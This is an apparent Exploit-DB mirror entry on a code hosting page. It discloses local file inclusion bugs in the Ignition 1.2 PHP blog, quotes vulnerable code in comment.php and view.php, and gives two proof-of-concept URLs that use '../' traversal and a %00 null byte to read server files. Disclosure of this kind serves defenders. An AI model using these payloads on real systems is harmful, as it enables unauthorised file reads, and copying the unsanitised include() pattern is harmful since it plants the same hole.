bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10569.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
821 B
Text
Raw Blame History

Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)
comment.php
1. <?php
2. session_start();
3. require ('settings.php');
4. include ('posts/'.$_GET['blog'].'.txt'); # [1]
5. ?>
view.php
1. <?php
2. session_start();
3. require ('settings.php');
4. $blog = $_GET['blog'];
5. if (file_exists('posts/'.$_GET['blog'].'.txt')) {
6. include ('posts/'.$_GET['blog'].'.txt'); # [2]
7. }else{
proof of concept:
[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00
Reference in a new issue View git blame Copy permalink